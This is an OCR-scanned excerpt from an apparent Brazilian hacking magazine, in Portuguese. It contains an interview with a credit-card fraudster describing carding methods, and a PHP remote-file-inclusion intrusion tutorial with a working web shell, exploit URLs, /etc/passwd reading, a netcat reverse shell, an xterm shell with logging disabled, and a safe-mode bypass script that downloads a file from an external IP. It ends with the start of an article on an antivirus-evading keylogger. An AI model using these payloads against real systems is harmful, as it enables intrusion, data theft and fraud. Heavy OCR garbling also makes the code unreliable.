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=== Quem 


DE 
To DE UMA INFECDÃO 
ATA 


PERE ARQUIVOS APOS UMA INVASÃO 


Gl) CONTEÚDO DO SEU CD-ROM 


CARDERS 


ed 


PERA, 
ss 


or hora são registradas nove tentativas de invasão de siste- 

mas de empresas ou de computadores pessoais. Quadrilhas 

estão cada vez mais especializadas em crimes cibernéticos. 
Os peritos no assunto estimam que os golpes via internet produzem 
prejuízos ultrapassam os 13 bilhões de dólares ao ano. No Brasil, as 
fraudes somam mais de 400 milhões de reais em 2004. É uma gota 
d'água em um sistema que deve movimentar 6,4 trilhões de dólares 
em todo o mundo, em 2004. Hacker conversou com um carder que 
afirmar integrar um grupo de invasão e uso de cartões roubados 
chamado CardersBR. Eles tem de 17 a 24 anos, são de Minas Gerais. 
Por questão de segurança, o entrevistado se identificou como cshrc. 


Há quanto tempo está envolvido com carding? 

Há oito meses. 

O que motivou você a entrar e permanecer nesse meio? 

Amigos, interesse pessoal e, claro, ter as coisas sem ter de pagar 
com meu dinheiro. 

Um carder necessariamente tem de ser um hacker/cracker 
para conseguir os cartões? 

Sim. No caso, tem que ser cracker para quebrar senhas de site e 
hacker para achar a falha e adquirir os cartões. 

Isso o coloca no hall dos hackers, ou alguém faz esse tra- 
balho pra você? 


E jiu 


AS, róubam senhas e utilizam cartô 


Não, há membros que fazem isso que até são de outros países, como 
um cara da Hungria. É ele quem faz isso para mim. 

Qual a operadora mais vulnerável? 

Olha, não tem preferência, a operadora mais vulnerável no momento, 
sem dúvida, é a American Express, por ser mais aceito no mercado e 
ter um prazo maior de validade. 

Quais são as formas que um carder pode usar para con- 
seguir os cartões? 

Bom, as mais utilizadas são: descobrindo o bug de um site de 
compras onde ficam depositados os cartões nos arquivos de exten- 
são .db, pegando em redes gringas como dalnet.com ou até mesmo 
roubando (aí é outro assunto). 

Qual foi o maior golpe, de uma só vez, que você fez? E 
como foi feito? 

Essa parte é boa. O maior golpe foi a compra de três laptops de 
uma vez na Semp Toshiba, feita normalmente, em um sábado à 
noite. Abri meu Opera (navegador), pus meu proxy e fui às compras. 
Bom, o total foi 14.000 dólares, e a compra foi aceita, parcelada no 
cartão em seis vezes. Mas o dono do cartão cancelou e meu pedido 
não veio (essa parte é a pior). Isso foi há muito tempo, no início. 
Agora, nós compramos muitos livros, softwares, domínios, peças 


para PC, notebooks etc. Uma das minhas compras bem-sucedidas foi 


de um CD-ROM e um monitor de 17”, tela plana, com valor estimado 


em dois mil dólares. Mas não fiquei com nada, vendi. 

Qual foi o maior golpe que você presenciou de carding? E 
como foi feito? 

Olha, vou falar do maior golpe do meu clã, CarderBR. Nós 
fazemos arrastões algumas vezes, juntamos todos e vamos 
às compras. Nosso último prejuízo foi de US$ 6.736,54, mas 
já houve maiores, só não lembro o valor. Em um desses casos, 
um membro nosso foi preso por usar CC Br e mandar entregar 
em casa. 

Ao comprarmos algo pela Internet usando cartões de cré- 
dito, um hacker pode interceptar as informações. Até que 
ponto isso é real? 

Isso é até novidade pra mim, mas vamos lá. Claro, nada é 
100% seguro, já virou ditado. Sempre suas informações fica- 
rão expostas em uma compra ou algo assim. Agora, sobre a 
parte de um hacker interceptar as informações, depende. Se 
ele estiver dentro da máquina (empresa) no mesmo momento 
em que você estiver efetuando a compra, obviamente ele terá 
acesso a tudo. 


Um carder age somente na Internet ou um garçom que clona 
um cartão também pode ser considerado um carder? 

Nós atuamos principalmente na área virtual, mas de vez em quando preci- 
samos falsificar uns documentos (faturas, RGs etc.) para não desconfiarem. 
Algumas vezes damos uma escapadinha e clonamos uns cartões. 

Os cartões internacionais são melhores ou piores do que 
os nacionais? 

Os internacionais são bem melhores, até porque costumam ter mais 
créditos do que os brasileiros, espanhóis, italianos... Os melhores são 
os americanos, japoneses e russos, por terem muito mais crédito do 
que os outros. 

Você tem um cartão de crédito seu? Se sim, não tem 
medo de ser roubado por outro carder? Se não, um dia 
pretende ter um? 


Olha, eu não tenho cartão não. Se um dia eu vier a ter, não vou 


me importar, até porque posso selecionar a operadora do cartão 


para me informar sobre todos os pedidos de compras e afins. Mas 
é como sempre se diz: nada é 100% seguro. 

Você nunca pensou em escrever um livro ou fazer um site 
para passar alguns dos seus conhecimentos de carding para 
quem quer saber deste meio? 

Sobre a questão do livro eu nunca pensei não, acho que não se ensina 
essas coisas, né? Passar conhecimentos é simples, qualquer um pode 
fazer, é só querer... 

O que você acha que deveria ser feito pelas operadoras de 
cartões para tentar travar isso? 

Se eu for pensar no meu caso, quero que eles deixem as 
coisas como estão, claro. As operadoras poderiam fazer o 
seguinte: no cartão você tem o número, nome de usuário, 
data de validade e agora o cvv2 (código de segurança). Elas 
poderiam solicitar um número extra no cartão, ou seja, no 
cartão normal, um número inválido que não servisse para 
absolutamente nada. Ele simplesmente ficaria no lugar do 
número válido. Você pegaria o cartão, olharia, veria o número, 
copiaria e, quando visse, não serviria para nada. O número 
verdadeiro seria um chip codificado implantado no cartão, 
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cuja clonagem é impossível. 

O Brasil está rumando para uma nova gestão financeira, 
em que os cheques ficarão quase extintos e tudo será feito 
com smart cards, ou seja, os cartões com chips que gravam 
informações de créditos, entre outras coisas. Você acha que 
isso causará algum problema às operadoras que o implanta- 
rem? Facilitará ou dificultará a ação dos clones? 

Não dificultará em nada a clonagem. Hoje você pode fazer isso 
até pelo computador. Eu vi uma matéria sobre os smart cards em 
um canal gringo, mostrando que computadores e programas estão 
sendo fabricados especialmente pra isso. Vai ser a mesma coisa que 
clonar um vale-transporte: é só passar no scan, imprimir, morreu. 

Você conhece mais alguma boa história sobre carders que 
fizeram compras com cartões roubados? 

Um maluco da Microsoft conseguiu pegar o cartão do senhor Bill 
Gates e não desfrutou da maravilha que conseguiu... 


Como os Sistomãs rodando PHP são burlados 


oje em dia, é comum 

a utilização de lingua- 

gens como a PHP para a 

construção de portais e 
sites dinâmicos em todo o mundo. 
Essa técnica oferece um meio de 
interagir com o Web site e outros 
usuários, tendo um meio de troca de 
informações, notícias etc. Uma das 
características desse tipo de site é 
que, por meio dele, se abrem diver- 
sas possibilidades de se explorar o 
sistema, atividade esta chamada de 
PHP Injection. Antes de invadirmos, 
vamos dar uma olhada e entender por 
que e como a brecha acontece. 

Na PHP, temos um recurso chamado 
include, o qual nos permite incluir um 
arquivo inteiro dentro de uma página 
já pronta. É muito usado em sites nos 
quais existe um layout predefinido e o 
conteúdo central é dinâmico. 


exemplol.php: 

<html> 

<head> 

</head> 

<body> 

<?php 
include(“arquivo.php”); 


Nesse exemplo, quando a página exemplol. 
php fosse processada pelo servidor Web, 
todo o conteúdo de arquivo.php seria proces- 
sado pelo servidor e colocado em exemplo]. 
php. Vamos supor que esse arquivo fosse 
escrito desta forma: 

<?php 


echo “<div>Data ChaOs - fdatachaOs</div>”; 
> 


A função echo da PHP exibe na página 
Web qualquer coisa que seja inserida nela. 
Então, ao abrirmos o exemplol.php, a PHP a 
processaria. Nesta página, a função include 
insere uma outra em PHP (arquivo.php) que, 
por sua vez, também é processada fazendo 
com que o código fique desta maneira: 


exemplol.php: 

<htmb 

<head> 

</head> 

<body> 

<div>Data ChaOs - fdatachaOs</div> 

</body> 

</html> 

O código-fonte da página não é alterado, 
pois ela simplesmente executa a PHP no 
servidor e retorna a saída em seu navegador. 
Com isso, vamos ao que interessa: a função 
include permite que façamos inclusões remo- 
tas, ou seja, poderemos incluir arquivos no 
código PHP, mesmo que estes não estejam 


no servidor em que está a página. 


Exemplo: 

<php 
include(“http://qualquerserver/ 

pagina.php”); 

?> 


Logo, a inclusão remota de arquivos é a 
base principal para conseguirmos acesso 
à máquina remotamente. Veremos, mais 
abaixo como injetar um código malicioso 


na página a ser invadida. Muitos dos atuais 


mess 


programadores de PHP aprenderam a lin- 
guagem por meio de revistas, que por sinal 
oferecem cursos bons, mas não dão uma 
visão ampla sobre as medidas de segurança 
que devem ser tomadas ao se programar 
uma página como essa. 

Geralmente, a função include é usada com 
o intuito de agilizar a exibição de uma página. 
É criado um layout estático, no qual somente 
o conteúdo muda e, para isso, o programador 
tem de definir uma variável para que esta 
possa receber o valor na qual será incluída 
no layout estático. 

cobaia.php: 

<html> 

<head> 

</head> 

<body> 

<div>Antes de incluir</div> 

<?php 

include($corpo); 
?> 
<div>Depois de incluido</div> 


</body> 
</html> 


Nesse exemplo, utilizamos a função include 
e, como parâmetro, adicionamos a variável 
$corpo. Essa variável receberá um valor e 
tentará incluir o arquivo com o nome que foi 
passado para ela. Vamos ver como ficaria: 


HELD: //4127.0.0+l heobraas 
php?corpo=arquivo.php 


Ao passar o parâmetro corpo=exemplo.php, 
indicamos que a PHP inclui o arquivo exemplo. 
php no código-fonte da página. 


À partir de agora, por convenção, usaremos 


o ip/host 127.0.0.1 como o servidor no qual o 
atacante quer ganhar acesso, o 192.168.0.2 
como o ip/host no qual o exploit está hospe- 
dado e localhost para o ip/host do atacante. 
Simularemos uma inclusão remota de arquivo: 
o código usado na simulação é idêntico ao 
cobaia.php e foi usado o arquivo.php com 
descrito acima. 


http://127.0.0.1/cobaia.php?corpo=htt 
p://192.168.0.2/arquivo.php 
Muitas vezes, vamos nos deparar com outras 
formas de uso do include. 


<?php 
include($corpo . 
?> 


“ePhpods 


O ponto logo após $corpo e antes de .php é 
usado para concatenar strings. 

Agora, o usuário não precisa mais passar 
como parâmetro a extensão do arquivo: 


http://127.0.0.1/cobaia.php?corpo=http 
://192.168.0.2/arquivo 


Antes de incluí-lo, será adicionado .php no 
final da variável $corpo, tornando-a assim: 


<?php 
include(“http://192.168.0.2/arquivo. 

php”); 

?> 


Essa forma é bastante comum e pretende 
facilitar a vida do programador, mas isso traz 
problemas em potencial quando se trata de 
inclusão de arquivos remotos sobre o ponto 
de vista do atacante. Se o invasor estiver 
rodando seu servidor Web com PHP ativo, 
ele não poderá usar essa técnica, já que 
todo o conteúdo php seria pré-processado 
na máquina do atacante e a resposta é 
apenas incluída no servidor-alvo. O que nós 
queremos é que o servidor-alvo execute as 
instruções PHP que queremos. Por isso, a 
partir de agora, não usaremos mais exten- 
sões .php. Podemos usar qualquer uma que 
não seja pré-processada pelo servidor Web 
que vai hospedar o nosso exploit. Escolhe- 
mos .gif, mas você pode usar qualquer tipo 
de extensão: .txt, .bmp, .jpg. 


Existe uma forma de se conseguir burlar esse 
tipo de declaração do include. Você terá de usar 
a seguinte construção: 


http://127.0.0.1/cobaia.php?corpo=http 
://192.168.0.2/xpl .gif? 


Com esse ponto de interrogação logo após 
xpl.gif, você conseguirá o efeito desejado. 
Antes de fazer a inclusão, a PHP ficaria 


assim: 


<?php 
include(“http://192.168.0.2/xpl. 

gif?.php”); 

?> 


Tudo o que vier depois do ponto de interroga- 
ção será descartado pelo servidor 192.168.0.2, 
sendo possível, assim, descarregar o xpl.gif 
para dentro do servidor-alvo. 

Portanto, a partir de agora, sempre usare- 
mos esse ponto de interrogação, já que pode 
ser usado nos dois casos. 


crepe é 


opera ro pagos 
E ÕR pera toner 1 ME NPE pes 
Tea not SE? 
preentontursasria 


Existem outras formas de construção co- 
muns também para o include, uma delas seria: 


cobaiaZ.php: 

<?php 
include(“/var/www/htdocs/” 

po); 

?> 


« $cor- 


Agora, se tentarmos incluir algo desta forma: 


http://127.0.0.1/cobaia.php?corpo=htt 
p://192.168.0.2/xpl.gif? 


Resultaria em um erro porque o servidor 
não conseguiria fazer a inclusão de: 


<?php 
include(“/var/www/htdocs/ 

http://192.168.0.2/xpl.gif?”); 

?> 


Infelizmente, nossas chances de conseguir 
incluir arquivos remotamente caiu a zero. Porém, 
ainda é possíveltirar vantagem dessa situação se 
tentarmos a seguinte construção: 


http://127:.0.0.T/cobaidás 
php?corpo=../../../etc/passwd 


Na hora do include, ficaria assim: 


<?php 
include(“/var/www/htdocs/../../../ 

etc/passwd”); 

?> 


PROGRAMAÇÃO 


CD 


Permitindo, assim, que possamos ler qualquer 
arquivo no servidor no qual tenhamos permis- 
são para isso. Apenas arquivos como .php não 
poderiam ser lidos, já que seriam processados 
pelo servidor, o que nos impediria de ver o código- 
fonte. Ler arquivos sensíveis como o /etc/passwd 
é essencialmente interessante para lançar ataques 
futuros, já que agora você possui uma lista de 
todos os usuários do computador. Com isso, você 
pode tentar adivinhar senhas com ferramentas 
automatizadas em daemons, como SSH ou telnet. 
Você também pode ler arquivos como o /etc/issue 
(no caso do Linux) para determinar qual versão e 
distribuição o servidor-alvo roda (Red Hat 7.3, SuSE 
8.0, Slackware 8.1)e, assim, lançar um ataque com 
maior grau de precisão. 


Já sabemos como incluir um script de PHP 
remotamente. Poderemos criar um script 
malicioso para que seja executado dentro da 
página. Abaixo segue um exemplo: 


<CENTER> 

<H2 STYLE="color: 
CMD</H2> 

<TABLE BORDER="1” CELLPADDING="0" CELLS- 
PACING="0” WIDTH="600" HEIGHT="20"> 


fFFFO000”>Data Cha0s 


<TR> 
<TD WIDTH="600" MHEIGHT="20" 
VALIGN="center”> 
<PRE> 
<FONT FACE="verdana” SIZE="2"> 
<?php 


// CMD - To Execute Command on File 
Injection Bug 

if Cisset($chdir)) Echdir($chdir); 

ob start(); 

passthru(“$cmd”); 

$output = ob get contents(): 


ob end clean(); 


if (lempty($output)) echo str repla- 
Cel CAGE”, 
$output)); 
?> 
</FONT> 
</PRE> 


str replace(“<“, “&lt;”, 


e am 
8 hacker 
<a 


O 


</TD> 
&/TR> 

</TABLE> 

</CENTER> 


Esse código foi obtido na Internet, mas fize- 
mos algumas modificações nele. Destacamos 
a função passthru, pois é ela que nos permite 
executar comandos para o servidor no qual es- 
tamos fazendo a injeção do código. A função usa 
a variável $cmd para armazenar os comandos 
e enviá-los ao sistema. Para usá-la, devemos 
utilizar a seguinte sintaxe: 


http://127.0.0.1/index.php?corpo=http: //1 
92.168.0.2/xpl.gif?&cmd=cat /etc/issue 


Dica: Sempre que for usar um caractere 


de espaço, o substitua por %20 ou pelo 
símbolo de mais. 


O símbolo & é um delimitador de parâme- 
tros para index.php. Portanto, nem ele nem 
o resto subsegiiente é passado para a função 
include, o que fica desta forma: 


<?php 
include(“http://192.168.0.2/xpl. 

gif”): 

?> 


O CMD será passado como forma de variável 
pois contém o comando que será executado no 
servidor-alvo, o qual será interpretado pelo xpl. 
gif que foi incluído no index.php. 

Vamos, então, fazer a simulação dainclusão 
remota no servidor-alvo: 


http://127.0.0.1/cobaia.php?corpo-http://19 
2.168.0.2/xpl .gif?&cmd=cat%20/etc/issue 


Nesse exemplo, usamos o comando cat 
/etc/issue e o resultado foi: 


Welcome to Linux Slackware 9.0.0 


Kernel on an 


Logo, já conhecemos o sistema operacional 
em que injetamos o código. Agora, vamos 
verificar a versão do kernel e o ID: 


http://127.0.0.1/cobaia.php?corpo=http://1 
92.168.0.2/xpl .gif?&cmd=id;uname -a 


Dota Chaôs CMD 


O que foi mostrado na tela: 


uid=99(nobody) gid=98(nobody) 
groups=98(nobody) 

Linux dchaOs 2.4.20 42 Mon Mar 17 22:02:15 
PST 2003 586 unknown 


Já sabemos nossas versões do ID e do kernel. 
Agora, executaremos um Is -al para verificar 
os arquivos no servidor: 


http://127.0.0.1/cobaia.php?corpo=http: // 
192.168.0.2/xpl .gif?&cmd=Is -al 


Ao executarmos o comando, foi retornada a 
lista de arquivos da página na qual injetamos o 
código malicioso. ATENÇÃO, a listagem foi: 


total 36 

drwxr-xr-x 2 root root 
4096 Oct 31 21:11. 
drwxr-xr-x 5 root root 
4096 Feb 25 2001... 

-rwW-r—r— root root 
100 Oct 31 15:32 admin.php 
=PW-r=r— root root 
54 Oct 31 14:35 arquivo.php 
-[w-r-pr— root root 
137 Oct 31 14:36 cobaia.php 
-PW-p—pr— 1 root root 
159 Oct 31 14:49 cobaia2.php 
-Pw-r—r— 1 root root 
105 Oct 31 14:14 index.html 
-rwW-r=r— 1 root root 
2631 Oct 31 21:12 safemode.gif 
-[wW-r—r— 1 root root 


557 Oct 31 15:16 xpl.gif 


Reparem nas permissões do arquivo admin. 
php Crw-r—r—). Isso indica que o dono do ar- 
quivo pode ler e escrever (rw-), o grupo pode ler 
(r—)e outros usuários podem ler (r—). Com base 
nisso, poderemos ler o conteúdo da página de ad- 
ministração do nosso suposto administrador. 


http://127.0.0.1/cobaia.php?corpo=http:// 
192.168.0.2/xpl.gif?2&cmd=cat admin.php 


A saída foi: 
<?php 
if ($senha = 1234567890) 
include(“adm.php”); 
else à 


echo “Senha inválida”; 
» 


Assim, podemos saber a senha para 
acessar a área administrativa do site, que é 
1234567890. O mesmo pode ser feito com 
conexões a Banco de Dados. Geralmente 
seus arquivos são: 


connect.php, conexao.php, db.php. 


Pode-se usar também .inc. 


Agora, precisamos de uma shell com a qual 
possamos dar comandos interativamente. Para 
isso, usaremos a ferramenta netcat (nc). Você 
precisará dela em seu computador e na máquina- 
alvo. Esse utilitário para Unix foi portado também 
para plataforma Windows pelo grupo IOpht. Para 
saber mais, entre no site: www.lOpht.com. Por 
ser uma ferramenta muito poderosa, a possibi- 
lidade de encontrá-la no servidor que você está 
tentando acessar aumentou dramaticamente nos 
últimos tempos. Agora, algumas distribuições 
Linux estão trazendo-a como padrão. Abrindo 
uma porta para receber os dados: 


[rootedchaOs h4rv3stJf nc -vv -1 -p 666 
listening on [any] 666 ... 


Pronto! Já temos nosso computador (a porta 
deve ser aberta no seu PC e não no servidor) 
escutando na porta 666. Agora, enviaremos a 
shell pelo browser da seguinte maneira: 


http://127.0.0./cobaia.php?corpo=http://192 
J68.0.2/xpl.gif?&crmd=/usr/bin/nc -e /bin/sh 
localhost 666 


Um erro ocorreu enquanto Carregava: 


http://27.0.0.1/cobaia.php?corpo=http://1 
92.168.0.2/xpl.gif?&cmd=/usr/bin/nc%)20- 
e%20/bin/shY%20localhostY20%20666 


Tempo esgotado no servidor 
127.0.0.1 


Isso aconteceu porque o servidor excedeu 
o tempo limite da conexão por não esperar 
a saída do comando executado para retornar 


ao seu navegador. Mas daremos uma olhada 
na shell em que deixamos o netcat escutando. 
Você verá que chegou uma conexão à porta, e 
agora pode dar comandos à vontade. Usamos 
o ID e o uname -a para demonstrar: 


[root(DdchaOs h4rv3st]H nc -vv -| -p 666 
listening on [any] 666 ... 

connect to [127.0.0.1] from localhost 
[127.0.0.1] 1041 

id 
uid=99(nobody) gid=98(nobody) 
groups=98(nobody) 

uname -a 

Linux dchaOs 2.4.20 $2 Mon Mar 17 
22:02:15 PST 2003 1586 unknown 


Funciona perfeitamente. Só um detalhe: 
quando estiver na shell, não use Ctrl + C, pois 
isso fará com que ela caia. Existe outra maneira 
de conseguir uma shell de forma mais interes- 
sante, mas esta dica afeta apenas usuários 
Unix. Quando você entra no seu Linux em 
modo gráfico, ele abre a porta 6000, se você 
ou sua distribuição não tiver bloqueado essa 
opção. Tal porta é usada pelo seu computador 
para compartilhar um modo gráfico para ou- 
tros sistemas Unix. 

Usaremos o xterm que vem por padrão em 
todas as distribuições Unix para conseguir 
nossa shell. No Linux, esse programa fica no 
diretório /usr/XIR6/bin, no Solaris no /usr/ 
openwin/bin. Procure-o com o comando find 
em caso de se tratar de outra versão Unix. O 
xterm, muitas vezes, é apagado ou sua per- 
missão alterada pelo administrador do para 
que você não possa executá-lo por medidas 
de segurança. Portanto, não estranhe se não 
encontrá-lo no servidor-alvo. Mas antes de 
tudo, você deve permitir que seu servidor X 
aceite a conexão com o servidor-alvo com o 
comando xhost. 

A sintaxe do comando seria: xhost +127.0.0.1, 
sendo 127.0.0.1 correspondente ao IP da 
máquina atacada. Também é possível usar 
somente o comando xhost +, mas com isso 
você permitiria a qualquer um conectar-se 
a seu servidor X sem autentificação, o que 


acarretaria muitos problemas de segurança. 


Tente não usar essa construção. 

Lembre-se: esse comando deve ser dado 
no seu computador e não no servidor-alvo. 

Agora, com a permissão dada para o 
servidor atacado conectar-se a seu com- 
putador, você precisará usar o comando: 
/usr/XNR6/bin/xterm -ut -display loca- 
lhost:0.0 no computador invadido para 
conseguir a shell. 


http://127.0.0.1/cobaia.php?corpo= 
http://192.168.0.2/xpl .gif2&cmd=/ 
usr/X11R6/bin/xterm%20-utz%20- 
display4201ocalhost:0.0 


Se tudo correr normalmente, você verá uma 
janela se abrindo, na qual poderá dar os comandos 
que quiser. A opção -ut é usada para que não seja 
gravado um log da conexão. Isso é possível por 
padrão no Linux, mas consulte o help do xterm em 
outros Unix para saber se também é suportada. 

À opção -display serve para que apareça ape- 
nas um prompt de comando, não o modo gráfico 
do computador invadido. Este deve ser usada em 
todo sistema Unix. Depois que a shell chegar, dê o 
comando xhost - em seu computador. Isso não fará 
comque ela caia, mas impedirá que novas conexões 
em seu servidor X sejam permitidas. 


PHP INJECTION EM SAFEMODE 

Como era de se esperar, na PHP há casos em 
que o servidor tem proteções contra a execução 
de comandos no sistema. 

Essas configurações podem ser feitas dire- 
tamente no arquivo php.ini. 

Abaixo segue a lista das linhas que podem 
ser modificadas: 


; Safe Mode 


safe mode = 0ff 


Aqui, vemos que por padrão o Safemode é 
desabilitado: 


safe mode = Off 


Para habilitá-lo, basta trocar Off por On. 
Essa linha habilita uma forma generalizada do 
sistema de segurança, logo, alguns aplicativos 
como webmail, por exemplo, podem parar de 
funcionar. Para que isso não aconteça, pode- 
mos usar outro parâmetro para filtrarmos as 
funções: 


This directive allows you to disa- 


ble certain functions for security 
reasons. 

; It receives a comma-delimited list of 
This directive is 
*NOT* affected by whether Safe Mode 


is turned On or Off. 


function names. 


disable functions = passthru 


Nesse exemplo, mandamos filtrar a função 
passthru. Outras funções como exec, system 
devem ser filtradas também, pois todas per- 
mitem a execução de comandos. Mas se você 
precisar que seu script execute algum coman- 
do, poderá usar esta configuração: 


: When safe mode is on, only executables 
located in the safe mode exec dir 

; Will] be allowed to be executed via the 
exec family of functions. 


safe mode exec dir = 


Aqui, você pode escolher um diretório no 
qual ficarão armazenados somente os coman- 
dos que forem necessários: 


safe mode exec dir = /phpexec 


Logo, somente os comandos de dentro do 
diretório /phpexec poderiam ser executados. 

Várias medidas podem ser tomadas, basta 
dar uma olhada no arquivo php.ini. Quando o 
sistema está com safe mode = On, não são 
exibidas mensagens na tela, mas isso pode 
ser burlado como explicado a seguir. 


BURLANDO O SISTEMA 

EM SAFEMODE 

A PHP inclui, em seu sistema, alguns coman- 
dos nativos como opendir, chmod, fopen, fwri- 
te dentre outros que nos permitirão burlar em 
parte o Safemode. Poderemos, com o exploit 
abaixo, listar, visualizar conteúdo, escrever em 
arquivos dentro do sistema. Isso tudo, é claro, 
se tivermos permissão para tais privilégios. 
Geralmente, com listagem e visualização, 
teremos acesso à maioria dos servidores. Já 
para escrever, nem sempre será possível. Esse 
exploit funciona da mesma maneira que aquele 

itado anteriormente. 


<pre><font face="Tahoma” size="2"> 
<?php 

echo “<font size=2>"; 

echo “PHP Write and Read in Safe- 
Mode. Exploit By Cr4shyng of Data 
ChaOs<br>”; 

$uname = posix uname(); 

while (list($teste, $testel) = each 
($uname)) 

echo “$teste: $testel<br>”; 


$dono = get current user(): 
Echo “current user 
$dono<br>”; 


Script: 


$ver = phpversion(): 
Echo “php version: $ver<br>”: 
$login = posix getuid(); 


Echo “user info: id($login)”; 


$euid = posix geteuid(); 
êgid = posix getgid(); 
Echo “ gid($gid)”; 

Echo “ euid($euid)<br>”:; 
if ($dir2 =="") 

$dir2 = getcewd(); 


Echo “current Path: $dir2<br>”: 
if ($dir = Copendir($dir2)) 
echo”<TABLE border=1 cellIspacing=1 
cellpadding=0>":; 
echo”<TR>”; 
echo”<TD valign=top>”; 

Echo “<b><font size=2 
face=arial>List All Files</b> 
<prasbrz” a 


while (($file = readdir($dir)) 
I== false) 
if (eis file($file)) 
$filel = fileowner($file); 
$file2 = fileperms($file); 
echo “<font 
color=green>$filel - $file2 - $file 
</font><br>”; 


flush(); 


echo CS/TD>": 
echo”<TD valign=top>”; 

Echo “<b><font size=2 
face=arial>List Only Folders</b> 
<br><br>”; 


if ($dir = Copendir($dir2)) 
while (($file = readdir($dir)) 


I== false) 

if (Ois dir($file)) 
$filel = fileowner($file); 
$file2 = fileperms($file); 


echo “<font 
color=blue>$filel - $file2 - $file 
Su fomtAsbra”s 


Geo “G/TD28s 


echo”<TD valign=top>”; 

Echo “<b><font; 'size=2 
face=arialDList Writable Folders</ 
b> <br><br>”; 
if ($dir = Copendir($dir2)) 

while (($file = readdir($dir)) 
I== false) 

if (Ois writable($file) && 
Ois dir($file) ) 
$filel = fileowner($file); 
$file2 = fileperms($file):; 
echo “<font color=red>$filel 
- $file2 - $file </font><br>”; 


echo “</TD>”; 
echo “</TD>”; 
echo”<TD valign=top>”; 

Echo “<b><font size=2 
face=arial>List Writable Files</b> 
<br><br>”; 


if ($dir = opendir($dir2)) 
while (($file = readdir($dir)) 
I== false) 
if (Ois writable($file) && 
eis filetsfile) ) 


$filel = fileowner($file); 
$filez 


] 


fileperms($file); 
echo “<font color=red>$filel 
GR 1 po =p e RR 6 2] 0 


Bend CSI TOPS 
echo “</TR>”; 
echo “</TABLE>”: 


/1 Function to Visualize Source 
Code files 

MG is) 

eis 

STp =-fopen(Ssee, “rd: 

$read = fread($fp, 30000); 

echo “<textarea name=textarea 
cols=80 rows=80>":; 

echo “$read”:; 

Echo “</textarea>”; 


ifalsdr e ==288 
else 

$rox = fopen(“http://200.222.176.31 
// Change this 


|| sfdfc ==") 


AgoM php”, Sir me 


IP/FILE 

$data = fread($rox, “9000”); 
$d = fopen($dir2.$fdfc, “w”); 
fwrite($d, $data); 


res 
</font></pre> 


Um exemplo de uso seria: 
http://127.0.0.1/cobaia.php?cor 


po=http://192.168.0.2/safemode. 
gif?&parametro=blabla 


Para ver o código-fonte de algum arquivo 
no servidor: 
http://127.0.0.1/cobaia.php?cor 
po=http://192.168.0.2/safemode. 
gif?&see=admin.php 


Então, temos aí o código-fonte do arquivo 
admin.php na tela dentro da Text Box. Existem 
outras funções no exploit, como escrever em 
arquivos, mudar o PATH, mas deixaremos 
para vocês mexerem nele. Caso queiram saber 
o que cada função faz, o site www.php.net é 
uma biblioteca completa com as funções e 
exemplos da PHP. 


CONSIDERAÇÕES FINAIS 

Vimos que os sistemas feitos em PHP 
podem ser facilmente invadidos com essa 
técnica. Não é apenas a função include que 
nos permite isso, temos também as funções 
require, requires once, include once 


Cr4shyng & h4rv3st 
Data Cha0s - www.datachaOs.com 
irc.brasnet.org - ifdatachaOs 
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alma, esta não é mais uma daquelas ma- 

térias chatas sobre vírus, de conteúdo 

meramente histórico ou relacionando 

um ou outro conselho que já estamos 

cansados de ouvir (“verifique os anexos 
de e-mail antes de abri-los”, “mantenha seu antivírus 
atualizado” etc.). 

É evidente que não basta ter um bom antivírus, 
mesmo que atualizado. Afinal, novas pragas di- 
gitais surgem, na pior das estatísticas, semanal- 
mente. Muitos discordam dessa tese, mas resolvi 
prová-la de um modo muito simples: fabricando 
um programa com características virais, mas que 
não seja reconhecido por qualquer antivírus - o 
resultado está disponível no CD-ROM da revista 
e comentado ao longo desta matéria. 


remoto ao computador enquanto o Keylogger captura 
as teclas digitadas no computador da vítima, gravan- 
do-as em um arquivo de texto que, periodicamente, 
é remetido ao usuário mal-intencionado, interessado 
nessas informações. 

O programa-alvo desta matéria pode funcionar 
como Trojan Horse do tipo Keylogger. É evidente que 
o programa em si não é ilícito, nem tampouco sua 
programação configura crime. Ilícito é o uso do programa 
para fins ilegais, como violação de correspondência [é 
importante lembrar que, juridicamente, “E-mail se carac- 
teriza como correspondência pessoal” (TRT, 3º R. - RO 
0634/97 - 42 T. - Rel. Juiz Fernando Luiz Gonçalves Rios 
Neto - DJMG 04/10/1997]. 

Não comete crime, por exemplo, o empregador que 
monitora o uso da Internet disponibilizada no local do 


DECIDIMOS CRIAR UM PROGRAMA COM CARAC- 
TERÍSTICAS DE UM VÍRUS PARA TESTAR COMO 
FUNCIONARIA A INFECÇÃO DE UM COMPUTADOR 


Há quem afirme que não seria necessário ir tão longe, 
bastaria compactar e criptografar um vírus já descoberto 
para que ele fosse mais reconhecido. Mas esse método 
só funcionaria para um arquivo; uma vez executado 
o programa, certamente o antivírus o detectaria na 
memória do micro. 

Antes de prosseguirmos no estudo, vale uma adver- 
tência: vírus e programa com características virais não 
são o mesmo. Um programa com características virais 
não se multiplica nem danifica o computador. Só será 
considerado vírus quando introduzido no computador 
por outra pessoa, que não seja o proprietário, e sem a 
autorização deste. Tratam-se dos malfadados Trojan 
Horses, Cavalos de Tróia, na tradução literal. 

Dois são os alvos fundamentais de um vírus Trojan 
Horse, e talvez esta seja a melhor forma de distingui- 
los das demais espécimes virais: abrir uma Backdoor 
ou funcionar como Keylogger. Na primeira hipótese, 
o programa permite que outro usuário tenha acesso 


trabalho mediante um Keylogger. Afinal, fiscalizar as 
atividades do empregado em trabalho nada mais é do 
que o exercício de um direito (artigo 2º da CLT). Desta 
forma, nada mais justo que a intervenção do emprega- 
dor, punindo seu subordinado que usa irregularmente 
a conexão de Internet fornecida como ferramenta de 
trabalho. Embora seja viável o prévio aviso dos empre- 
gados quanto à monitoração, há quem defenda a tese 
de que isso não deva ser obrigatório, uma vez que não 
está escrito no contrato trabalhista. Dessa forma, não 
é forçoso concluírmos que, ao enviar ou receber e-mails 
no local e horário de trabalho, o empregado concorda 
tacitamente com a leitura dos mesmos, uma vez que são 
presumidamente de interesse da empresa. Com isso, já 
pudemos verificar um uso lícito para o programa capaz 
de retirar-lhe o estigma de vírus. Diferente é a situação 
de quem camufla o programa dentro de uma animação 
em Flash e envia esse pacote para um amigo, esperando 
com isso receber senhas de e-mail e cartão de crédito. 
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DICAS GERAIS PARA LIDAR COM 
jo 
OS VIRUS 

O primeiro conceito importante é deter- 
minado pelo vírus “residente na memória do 
computador”. Isso significa, apenas, que ele 
é carregado para a memória do computador 
sempre que ligado (vírus de boot) ou quan- 
do o Windows é iniciado. Os vírus de boot 
são os mais difíceis de lidar, pois exigem 
